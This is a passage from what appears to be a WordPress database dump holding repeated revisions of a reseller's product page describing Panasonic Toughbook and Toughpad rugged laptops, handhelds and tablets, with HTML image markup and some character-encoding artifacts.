sizes=\"(max-width: 418px) 100vw, 418px\" />											\n		<h5>PRODUCT DETAILS</h5><p>A semi-rugged 14â€ laptop, the TOUGHBOOK 54 is the world\'s thinnest and lightest semi-rugged in its class, but now packs even more of a punch. The TOUGHBOOK 54 is now available with 7th Gen IntelÂ® processors running WindowsÂ® 10 Pro and feature a spill-resistant, full magnesium alloy design, storage drive heater and backlit keyboard. The TOUGHBOOK 54 has a wide range of integrated options such as dedicated GPS, 4G LTE mobile broadband with satellite GPS, and dual antenna pass-through. It offers an optional second battery, allowing hot swap battery replacement without the need to shut down or hibernate. The TOUGHBOOK 54 one of the most versatile and advanced semi-rugged notebooks on the market.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHBOOK 20</h4>		\n										<img width=\"300\" height=\"225\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/20mk2_laptop_right_angle_detached-1-300x225.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/20mk2_laptop_right_angle_detached-1-300x225.jpg 300w, https://bintara.com.my/wp-content/uploads/2018/12/20mk2_laptop_right_angle_detached-1.jpg 518w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The Panasonic TOUGHBOOKÂ® 20 is a fully rugged, lightweight laptop that easily detaches to become a 10.1\" tablet. And it only takes one hand. The detachable laptop has a magnesium alloy chassis and is also MIL-STD-810G and IP65 certified, so it can take the abuse of most any job site. At only 3.9 pounds, this 2-in-1 machine is good on the go. The clever built-in handle also functions as a kickstand, providing on-the-job flexibility. And even as the workday gets longer, power won\'t be a problem. The optional bridge battery allows hot swap battery replacement without disruption. The gloved multi touch display is sunlight-viewable, making this hybrid laptop perfect for rugged outdoor environments. With this detachable laptop tablet at your side, you can handle anything the workday throws at you.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHPAD FZ-Q2</h4>		\n										<img width=\"300\" height=\"285\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/toughpad-q2-hero-300x285.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/toughpad-q2-hero-300x285.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/toughpad-q2-hero.png 390w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<h5>PRODUCT DETAILS</h5><p>From the industry leader in reliability comes the Panasonic TOUGHPADÂ® FZ-Q2 12.5-inch 2-in-1 WindowsÂ® 10 PC. Built with the rugged durability consumers have come to expect from TOUGHBOOK, this PC is designed for users who need more from their computer than what a typical consumer device can provide. Enhanced with features like a superior battery life and additional ports, the TOUGHPAD FZ-Q2 semi-rugged convertible tablet also possesses a full HD display with an anti-reflective touchscreen along with a spill-resistant keyboard to maximize usability in the field or in the office.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h3>Handhelds</h3>		\n			<h4>TOUGHBOOK T1</h4>		\n										<img width=\"277\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-t1_image1-1_ss_1.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-t1_image1-1_ss_1.jpg 277w, https://bintara.com.my/wp-content/uploads/2018/12/fz-t1_image1-1_ss_1-214x300.jpg 214w\" sizes=\"(max-width: 277px) 100vw, 277px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The Panasonic TOUGHBOOKÂ®Â T1 is a slim and sleek Android OS based handheld that proudly carries the TOUGHBOOKÂ name. Its ability to be used in the enterprise to collect information from workers in retail stores, warehouses field service, transportation and delivery or many other environments where work must occur belies its mild looking exterior. The FZ-T1 has a quad-core processor and a straight-shooting barcode reader, options to have a pistol grip with trigger, use a stylus pen or connect to multi-carrier 4G LTE with voice capability, yet end users will feel comfortable with its Android OS. This handheld\'s users wonâ€™t miss a beat with its great battery life, glove and rain touch enabled 5\" screen, 5 foot drop rating and IP66 and IP68 certification.Â  The TOUGHBOOKÂ T1 is ready to be used by satisfied end users everywhere in your organization.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHBOOK N1</h4>		\n										<img width=\"416\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-n1_mk2_android_image_2_1.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-n1_mk2_android_image_2_1.jpg 416w, https://bintara.com.my/wp-content/uploads/2018/12/fz-n1_mk2_android_image_2_1-300x281.jpg 300w\" sizes=\"(max-width: 416px) 100vw, 416px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The Panasonic TOUGHBOOKÂ® N1 â€” a powerful, slim and fully rugged handheld. Itâ€™s the all-in-one tool youâ€™ve been waiting for, and itâ€™s ideal for where work takes you each day. With an octa-core processor, angled rear-facing barcode reader, optional stylus pen, and long-lasting battery that is warm-swappable; you wonâ€™t miss a beat. And when a flexible device is in demand, the TOUGHBOOK N1 delivers the Androidâ„¢ operating system,Â giving you the ability to develop in an open environment with thousands of enterprise grade applications at your fingertips from the Google Play store or Panasonic\'s partners: independent software vendors (ISVs) and resellers/integrators. Plus, with built-in multi-carrier 4G LTE, voice capabilities, and dual SIM cards, the TOUGHBOOK N1 is ready to go where business takes you. And if it takes a seven-foot drop, donâ€™t worry â€” it can handle it, making it the choice for unrelenting conditions. So take it to work. It can take it.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHPAD FZ-X1</h4>		\n										<img width=\"210\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/236380_F1X1_Hero.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/236380_F1X1_Hero.png 210w, https://bintara.com.my/wp-content/uploads/2018/12/236380_F1X1_Hero-162x300.png 162w\" sizes=\"(max-width: 210px) 100vw, 210px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The TOUGHPADÂ® FZ-X1 is the world\'s most rugged 5-inch tablet and a whole lot more. For the first time, you can pair military-grade toughness and enterprise-class mobile computing power with Android-powered 4G data and voice services. Now field staff in the most demanding environments can have all the computing power they need in a handheld tablet small enough to drop in a pocket. Built on the flexible, secure Android 5.1.1 OS, the FZ-X1 lets businesses leverage their existing investments in enterprise applications without sacrificing performance and ruggedness. And it is seriously rugged.Â Thirty minutes of under five feet of water rugged.Â Ten foot drops onto solid concrete rugged. Built-in heater for -4Â° F weather rugged. Whether you throw it in a toolbox or literally take it into battle, the FZ-X1 can handle whatever comes its way.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h3>Tablets</h3>		\n			<h4>TOUGHBOOK L1</h4>		\n										<img width=\"519\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-l1_right_ss.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-l1_right_ss.jpg 519w, https://bintara.com.my/wp-content/uploads/2018/12/fz-l1_right_ss-300x225.jpg 300w\" sizes=\"(max-width: 519px) 100vw, 519px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The Panasonic TOUGHBOOK L1 is a slim and sleek Androidâ„¢ OS basedÂ 7\" tablet that proudly carries the TOUGHBOOKÂ name. Its ability to be usedÂ in the enterprise to collect information from workers in retail stores,Â warehouses field service, transportation and delivery or many otherÂ environments where work must occur belies its mild looking exterior.Â The TOUGHBOOK L1 has a quad-core processor and optional straight-shootingÂ barcode reader from portrait to landscape, use a stylus pen or connectÂ to multi-carrier 4G LTE and provide the ease of use of the Andorid OS.Â This tabletâ€™s users wonâ€™t miss a beat with its great battery life, glove andÂ rain touch enabled 7\" screen, 5 foot drop rating and IP65 and IP67Â certification. The TOUGHBOOK L1 is ready to be used by satisfied endÂ users everywhere in your organization.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHPAD FZ-M1</h4>		\n										<img width=\"584\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-m1_image_01_new_win10.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-m1_image_01_new_win10.jpg 584w, https://bintara.com.my/wp-content/uploads/2018/12/fz-m1_image_01_new_win10-300x200.jpg 300w\" sizes=\"(max-width: 584px) 100vw, 584px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The Panasonic FZ-M1 is the fully rugged WindowsÂ® tablet, built toÂ enable mission-critical mobile worker productivity without compromise. PoweredÂ by WindowsÂ® 10 Pro, the FZ-M1 features a long life, user-replaceableÂ battery and a daylight-readable, high-sensitivity multi-touch display for useÂ with heavy gloves. With the broadest range of configuration options available inÂ its class, the highly customizable FZ-M1 is the ideal tool for todayâ€™sÂ mobile workforce. In addition to the highly configurable options, added modelsÂ of Thermal Camera, Real Sense Camera, RTK/GPS, as well as several more.Â Allows the FZ-M1 to be the most comprehensive 7\" tablet in the market.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHPAD FZ-G1</h4>		\n										<img width=\"519\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-g1mk5_us_image02_ss.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-g1mk5_us_image02_ss.jpg 519w, https://bintara.com.my/wp-content/uploads/2018/12/fz-g1mk5_us_image02_ss-300x225.jpg 300w\" sizes=\"(max-width: 519px) 100vw, 519px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The FZ-G1 Windows 10 Pro tablet offers a fluid user experienceÂ while providing crucial port connectivity and feature-rich options in a compactÂ size. Designed for highly mobile field workers, itâ€™s the thinnest and lightestÂ fully rugged 10.1\" tablet running Windows 10 Pro 64-Bit. Powered by anÂ IntelÂ® Coreâ„¢ i5 vProâ„¢ processor with a MIL-STD-810G and IP65 certified, the FZ-G1 Windows 10 tablet leads the way in rugged mobileÂ computing. Add to that an HD daylight-readable 10-point gloved multi touch +Â waterproof digitizer pen, and it becomes an essential tool for field workers.Â With added Thermal camera and IR camera options.Â  Can also support \"Windows Hello\" for enhanced security.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHPAD FZ-A2</h4>		\n										<img width=\"418\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_fz_a2_hero_front-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_fz_a2_hero_front-1.png 418w, https://bintara.com.my/wp-content/uploads/2018/12/tb_fz_a2_hero_front-1-300x279.png 300w\" sizes=\"(max-width: 418px) 100vw, 418px\" />											\n		<h5>PRODUCT DETAILS</h5><p>With the Android 6.0 (Marshmallow) operating system and IntelÂ® x5-Z8550 processor, the Panasonic TOUGHPADÂ® A2 10.1-inch fully rugged Androidâ„¢ tablet provides enterprise features and reliability miles ahead of consumer tablets. With the ability to be WWAN 4G LTE connected and a super-bright 800 NIT screen, it is the perfect solution for workers in the field. However demanding the job, the dependable TOUGHPADÂ FZ-A2 tablet is up to the task.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHPAD FZ-B2</h4>		\n										<img width=\"400\" height=\"334\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/prod-jtb2-hero.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/prod-jtb2-hero.png 400w, https://bintara.com.my/wp-content/uploads/2018/12/prod-jtb2-hero-300x251.png 300w\" sizes=\"(max-width: 400px) 100vw, 400px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The rugged, 7-inch Panasonic TOUGHPADÂ® FZ-B2, now powered by Androidâ„¢ 6.0.1 (Marshmallow) and the latest IntelÂ® AtomTM x5-Z8550 processor is an easy-to-use, enterprise-grade productivity booster that works rain or shine. With durability, power and a range of configuration options â€“ at a price within reach of any business â€“ the TOUGHPADÂ FZ-B2 features a faster CPU, upgraded rear camera and Wi-Fi chipset, a quick-charging, user-replaceable full-shift battery and a Near Field Communications option. With a fully rugged and sealed design, the thin and lightweight TOUGHPADÂ FZ-B2 is built for long-lasting durability where others fail.</p><p>[maxbutton id=\"5\" ]</p>','Panasonic Toughbook Product','','inherit','closed','closed','','2580-revision-v1','','','2018-12-21 09:49:08','2018-12-21 01:49:08','',2580,'https://bintara.com.my/blog/2018/12/21/2580-revision-v1/',0,'revision','',0),(2684,1,'2018-12-21 09:49:28','2018-12-21 01:49:28','<h3>Computer Toughbook</h3>		\n			<h4>TOUGHBOOK 33</h4>		\n										<img width=\"418\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_33_hero.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_33_hero.png 418w, https://bintara.com.my/wp-content/uploads/2018/12/tb_33_hero-300x279.png 300w\" sizes=\"(max-width: 418px) 100vw, 418px\" />											\n		<h5><strong>PRODUCT</strong> DETAILS</h5><p>The Panasonic TOUGHBOOKÂ® 33 is the first fully-rugged 2-in-1 of its kindâ€”redefining rugged flexibility for those who work in demanding conditions. TOUGHBOOK 33 features a groundbreaking 3:2 display, making it easier to handle, while improving readability of the business applications and documents workers use every day. This innovative design also enables backward compatibility with an entire generation of TOUGHBOOK 31 vehicle docks. It\'s as versatile as your job demands it to be. From a brighter 12\" detachable screen with infrared camera for Windows Hello support, to hot-swappable twin batteries and a choice of keyboardsâ€”TOUGHBOOK 33 is built for maximum mobility.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHBOOK 31</h4>		\n										<img width=\"519\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/tb31_win10.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/tb31_win10.jpg 519w, https://bintara.com.my/wp-content/uploads/2018/12/tb31_win10-300x225.jpg 300w\" sizes=\"(max-width: 519px) 100vw, 519px\" />											\n		<header></header><h5>PRODUCT DETAILS</h5><p>Panasonic presents the TOUGHBOOKÂ® 31, the reliable laptop offeringÂ the worldâ€™s most rugged design. With drop-shock protection and aÂ MIL-STD-810G certification, itâ€™s the undisputed leader in the fullyÂ rugged category. Its IntelÂ® Coreâ„¢ i5 processor packs a punch and it delivers amazing battery lifeâ€”19.5 hours, or 29 hours with the optional media bayÂ 2nd battery. Combine six generations of delivering rugged performanceÂ plus an amazing 18 years of consistent docking compatibility, TOUGHBOOK 31 is a laptop that will go the distance with you anytime, anywhere.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHBOOK 54</h4>		\n										<img width=\"418\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_54_hero.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_54_hero.png 418w, https://bintara.com.my/wp-content/uploads/2018/12/tb_54_hero-300x279.png 300w\" sizes=\"(max-width: 418px) 100vw, 418px\" />											\n		<h5>PRODUCT DETAILS</h5><p>A semi-rugged 14â€ laptop, the TOUGHBOOK 54 is the world\'s thinnest and lightest semi-rugged in its class, but now packs even more of a punch. The TOUGHBOOK 54 is now available with 7th Gen IntelÂ® processors running WindowsÂ® 10 Pro and feature a spill-resistant, full magnesium alloy design, storage drive heater and backlit keyboard. The TOUGHBOOK 54 has a wide range of integrated options such as dedicated GPS, 4G LTE mobile broadband with satellite GPS, and dual antenna pass-through. It offers an optional second battery, allowing hot swap battery replacement without the need to shut down or hibernate. The TOUGHBOOK 54 one of the most versatile and advanced semi-rugged notebooks on the market.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHBOOK 20</h4>		\n										<img width=\"300\" height=\"225\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/20mk2_laptop_right_angle_detached-1-300x225.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/20mk2_laptop_right_angle_detached-1-300x225.jpg 300w, https://bintara.com.my/wp-content/uploads/2018/12/20mk2_laptop_right_angle_detached-1.jpg 518w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The Panasonic TOUGHBOOKÂ® 20 is a fully rugged, lightweight laptop that easily detaches to become a 10.1\" tablet. And it only takes one hand. The detachable laptop has a magnesium alloy chassis and is also MIL-STD-810G and IP65 certified, so it can take the abuse of most any job site. At only 3.9 pounds, this 2-in-1 machine is good on the go. The clever built-in handle also functions as a kickstand, providing on-the-job flexibility. And even as the workday gets longer, power won\'t be a problem. The optional bridge battery allows hot swap battery replacement without disruption. The gloved multi touch display is sunlight-viewable, making this hybrid laptop perfect for rugged outdoor environments. With this detachable laptop tablet at your side, you can handle anything the workday throws at you.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHPAD FZ-Q2</h4>		\n										<img width=\"300\" height=\"285\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/toughpad-q2-hero-300x285.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/toughpad-q2-hero-300x285.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/toughpad-q2-hero.png 390w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<h5>PRODUCT DETAILS</h5><p>From the industry leader in reliability comes the Panasonic TOUGHPADÂ® FZ-Q2 12.5-inch 2-in-1 WindowsÂ® 10 PC. Built with the rugged durability consumers have come to expect from TOUGHBOOK, this PC is designed for users who need more from their computer than what a typical consumer device can provide. Enhanced with features like a superior battery life and additional ports, the TOUGHPAD FZ-Q2 semi-rugged convertible tablet also possesses a full HD display with an anti-reflective touchscreen along with a spill-resistant keyboard to maximize usability in the field or in the office.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h3>Handhelds</h3>		\n			<h4>TOUGHBOOK T1</h4>		\n										<img width=\"277\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-t1_image1-1_ss_1.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-t1_image1-1_ss_1.jpg 277w, https://bintara.com.my/wp-content/uploads/2018/12/fz-t1_image1-1_ss_1-214x300.jpg 214w\" sizes=\"(max-width: 277px) 100vw, 277px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The Panasonic TOUGHBOOKÂ®Â T1 is a slim and sleek Android OS based handheld that proudly carries the TOUGHBOOKÂ name. Its ability to be used in the enterprise to collect information from workers in retail stores, warehouses field service, transportation and delivery or many other environments where work must occur belies its mild looking exterior. The FZ-T1 has a quad-core processor and a straight-shooting barcode reader, options to have a pistol grip with trigger, use a stylus pen or connect to multi-carrier 4G LTE with voice capability, yet end users will feel comfortable with its Android OS. This handheld\'s users wonâ€™t miss a beat with its great battery life, glove and rain touch enabled 5\" screen, 5 foot drop rating and IP66 and IP68 certification.Â  The TOUGHBOOKÂ T1 is ready to be used by satisfied end users everywhere in your organization.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHBOOK N1</h4>		\n										<img width=\"416\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-n1_mk2_android_image_2_1.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-n1_mk2_android_image_2_1.jpg 416w, https://bintara.com.my/wp-content/uploads/2018/12/fz-n1_mk2_android_image_2_1-300x281.jpg 300w\" sizes=\"(max-width: 416px) 100vw, 416px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The Panasonic TOUGHBOOKÂ® N1 â€” a powerful, slim and fully rugged handheld. Itâ€™s the all-in-one tool youâ€™ve been waiting for, and itâ€™s ideal for where work takes you each day. With an octa-core processor, angled rear-facing barcode reader, optional stylus pen, and long-lasting battery that is warm-swappable; you wonâ€™t miss a beat. And when a flexible device is in demand, the TOUGHBOOK N1 delivers the Androidâ„¢ operating system,Â giving you the ability to develop in an open environment with thousands of enterprise grade applications at your fingertips from the Google Play store or Panasonic\'s partners: independent software vendors (ISVs) and resellers/integrators. Plus, with built-in multi-carrier 4G LTE, voice capabilities, and dual SIM cards, the TOUGHBOOK N1 is ready to go where business takes you. And if it takes a seven-foot drop, donâ€™t worry â€” it can handle it, making it the choice for unrelenting conditions. So take it to work. It can take it.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHPAD FZ-X1</h4>		\n										<img width=\"210\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/236380_F1X1_Hero.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/236380_F1X1_Hero.png 210w, https://bintara.com.my/wp-content/uploads/2018/12/236380_F1X1_Hero-162x300.png 162w\" sizes=\"(max-width: 210px) 100vw, 210px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The TOUGHPADÂ® FZ-X1 is the world\'s most rugged 5-inch tablet and a whole lot more. For the first time, you can pair military-grade toughness and enterprise-class mobile computing power with Android-powered 4G data and voice services. Now field staff in the most demanding environments can have all the computing power they need in a handheld tablet small enough to drop in a pocket. Built on the flexible, secure Android 5.1.1 OS, the FZ-X1 lets businesses leverage their existing investments in enterprise applications without sacrificing performance and ruggedness. And it is seriously rugged.Â Thirty minutes of under five feet of water rugged.Â Ten foot drops onto solid concrete rugged. Built-in heater for -4Â° F weather rugged. Whether you throw it in a toolbox or literally take it into battle, the FZ-X1 can handle whatever comes its way.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h3>Tablets</h3>		\n			<h4>TOUGHBOOK L1</h4>		\n										<img width=\"519\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-l1_right_ss.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-l1_right_ss.jpg 519w, https://bintara.com.my/wp-content/uploads/2018/12/fz-l1_right_ss-300x225.jpg 300w\" sizes=\"(max-width: 519px) 100vw, 519px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The Panasonic TOUGHBOOK L1 is a slim and sleek Androidâ„¢ OS basedÂ 7\" tablet that proudly carries the TOUGHBOOKÂ name. Its ability to be usedÂ in the enterprise to collect information from workers in retail stores,Â warehouses field service, transportation and delivery or many otherÂ environments where work must occur belies its mild looking exterior.Â The TOUGHBOOK L1 has a quad-core processor and optional straight-shootingÂ barcode reader from portrait to landscape, use a stylus pen or connectÂ to multi-carrier 4G LTE and provide the ease of use of the Andorid OS.Â This tabletâ€™s users wonâ€™t miss a beat with its great battery life, glove andÂ rain touch enabled 7\" screen, 5 foot drop rating and IP65 and IP67Â certification. The TOUGHBOOK L1 is ready to be used by satisfied endÂ users everywhere in your organization.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHPAD FZ-M1</h4>		\n										<img width=\"584\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-m1_image_01_new_win10.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-m1_image_01_new_win10.jpg 584w, https://bintara.com.my/wp-content/uploads/2018/12/fz-m1_image_01_new_win10-300x200.jpg 300w\" sizes=\"(max-width: 584px) 100vw, 584px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The Panasonic FZ-M1 is the fully rugged WindowsÂ® tablet, built toÂ enable mission-critical mobile worker productivity without compromise. PoweredÂ by WindowsÂ® 10 Pro, the FZ-M1 features a long life, user-replaceableÂ battery and a daylight-readable, high-sensitivity multi-touch display for useÂ with heavy gloves. With the broadest range of configuration options available inÂ its class, the highly customizable FZ-M1 is the ideal tool for todayâ€™sÂ mobile workforce. In addition to the highly configurable options, added modelsÂ of Thermal Camera, Real Sense Camera, RTK/GPS, as well as several more.Â Allows the FZ-M1 to be the most comprehensive 7\" tablet in the market.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHPAD FZ-G1</h4>		\n										<img width=\"519\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-g1mk5_us_image02_ss.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/fz-g1mk5_us_image02_ss.jpg 519w, https://bintara.com.my/wp-content/uploads/2018/12/fz-g1mk5_us_image02_ss-300x225.jpg 300w\" sizes=\"(max-width: 519px) 100vw, 519px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The FZ-G1 Windows 10 Pro tablet offers a fluid user experienceÂ while providing crucial port connectivity and feature-rich options in a compactÂ size. Designed for highly mobile field workers, itâ€™s the thinnest and lightestÂ fully rugged 10.1\" tablet running Windows 10 Pro 64-Bit. Powered by anÂ IntelÂ® Coreâ„¢ i5 vProâ„¢ processor with a MIL-STD-810G and IP65 certified, the FZ-G1 Windows 10 tablet leads the way in rugged mobileÂ computing. Add to that an HD daylight-readable 10-point gloved multi touch +Â waterproof digitizer pen, and it becomes an essential tool for field workers.Â With added Thermal camera and IR camera options.Â  Can also support \"Windows Hello\" for enhanced security.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHPAD FZ-A2</h4>		\n										<img width=\"418\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_fz_a2_hero_front-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_fz_a2_hero_front-1.png 418w, https://bintara.com.my/wp-content/uploads/2018/12/tb_fz_a2_hero_front-1-300x279.png 300w\" sizes=\"(max-width: 418px) 100vw, 418px\" />											\n		<h5>PRODUCT DETAILS</h5><p>With the Android 6.0 (Marshmallow) operating system and IntelÂ® x5-Z8550 processor, the Panasonic TOUGHPADÂ® A2 10.1-inch fully rugged Androidâ„¢ tablet provides enterprise features and reliability miles ahead of consumer tablets. With the ability to be WWAN 4G LTE connected and a super-bright 800 NIT screen, it is the perfect solution for workers in the field. However demanding the job, the dependable TOUGHPADÂ FZ-A2 tablet is up to the task.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHPAD FZ-B2</h4>		\n										<img width=\"400\" height=\"334\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/prod-jtb2-hero.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/prod-jtb2-hero.png 400w, https://bintara.com.my/wp-content/uploads/2018/12/prod-jtb2-hero-300x251.png 300w\" sizes=\"(max-width: 400px) 100vw, 400px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The rugged, 7-inch Panasonic TOUGHPADÂ® FZ-B2, now powered by Androidâ„¢ 6.0.1 (Marshmallow) and the latest IntelÂ® AtomTM x5-Z8550 processor is an easy-to-use, enterprise-grade productivity booster that works rain or shine. With durability, power and a range of configuration options â€“ at a price within reach of any business â€“ the TOUGHPADÂ FZ-B2 features a faster CPU, upgraded rear camera and Wi-Fi chipset, a quick-charging, user-replaceable full-shift battery and a Near Field Communications option. With a fully rugged and sealed design, the thin and lightweight TOUGHPADÂ FZ-B2 is built for long-lasting durability where others fail.</p><p>[maxbutton id=\"5\" ]</p>','Panasonic Toughbook Product','','inherit','closed','closed','','2580-revision-v1','','','2018-12-21 09:49:28','2018-12-21 01:49:28','',2580,'https://bintara.com.my/blog/2018/12/21/2580-revision-v1/',0,'revision','',0),(2685,1,'2018-12-21 09:49:51','2018-12-21 01:49:51','<h3>Computer Toughbook</h3>		\n			<h4>TOUGHBOOK 33</h4>		\n										<img width=\"418\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_33_hero.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_33_hero.png 418w, https://bintara.com.my/wp-content/uploads/2018/12/tb_33_hero-300x279.png 300w\" sizes=\"(max-width: 418px) 100vw, 418px\" />											\n		<h5><strong>PRODUCT</strong> DETAILS</h5><p>The Panasonic TOUGHBOOKÂ® 33 is the first fully-rugged 2-in-1 of its kindâ€”redefining rugged flexibility for those who work in demanding conditions. TOUGHBOOK 33 features a groundbreaking 3:2 display, making it easier to handle, while improving readability of the business applications and documents workers use every day. This innovative design also enables backward compatibility with an entire generation of TOUGHBOOK 31 vehicle docks. It\'s as versatile as your job demands it to be. From a brighter 12\" detachable screen with infrared camera for Windows Hello support, to hot-swappable twin batteries and a choice of keyboardsâ€”TOUGHBOOK 33 is built for maximum mobility.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHBOOK 31</h4>		\n										<img width=\"519\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/tb31_win10.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/tb31_win10.jpg 519w, https://bintara.com.my/wp-content/uploads/2018/12/tb31_win10-300x225.jpg 300w\" sizes=\"(max-width: 519px) 100vw, 519px\" />											\n		<header></header><h5>PRODUCT DETAILS</h5><p>Panasonic presents the TOUGHBOOKÂ® 31, the reliable laptop offeringÂ the worldâ€™s most rugged design. With drop-shock protection and aÂ MIL-STD-810G certification, itâ€™s the undisputed leader in the fullyÂ rugged category. Its IntelÂ® Coreâ„¢ i5 processor packs a punch and it delivers amazing battery lifeâ€”19.5 hours, or 29 hours with the optional media bayÂ 2nd battery. Combine six generations of delivering rugged performanceÂ plus an amazing 18 years of consistent docking compatibility, TOUGHBOOK 31 is a laptop that will go the distance with you anytime, anywhere.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHBOOK 54</h4>		\n										<img width=\"418\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_54_hero.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_54_hero.png 418w, https://bintara.com.my/wp-content/uploads/2018/12/tb_54_hero-300x279.png 300w\" sizes=\"(max-width: 418px) 100vw, 418px\" />											\n		<h5>PRODUCT DETAILS</h5><p>A semi-rugged 14â€ laptop, the TOUGHBOOK 54 is the world\'s thinnest and lightest semi-rugged in its class, but now packs even more of a punch. The TOUGHBOOK 54 is now available with 7th Gen IntelÂ® processors running WindowsÂ® 10 Pro and feature a spill-resistant, full magnesium alloy design, storage drive heater and backlit keyboard. The 